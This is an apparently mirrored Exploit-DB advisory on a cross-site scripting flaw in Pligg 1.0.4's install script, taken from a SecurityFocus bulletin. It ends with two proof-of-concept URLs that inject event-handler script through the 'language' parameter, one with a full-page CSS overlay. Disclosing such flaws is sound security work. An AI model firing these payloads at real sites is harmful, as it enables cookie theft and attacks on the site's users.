exploit-db-mirror/platforms/php/webapps/34269.txt
Offensive Security 545c6bdf18 Updated 08_06_2014
2014-08-06 04:39:53 +00:00

11 lines
792 B
Text
Executable file

source: http://www.securityfocus.com/bid/41456/info
Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pligg 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/install/install1.php?language=%22%20onmouseover=alert()%3E
http://www.example.com/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E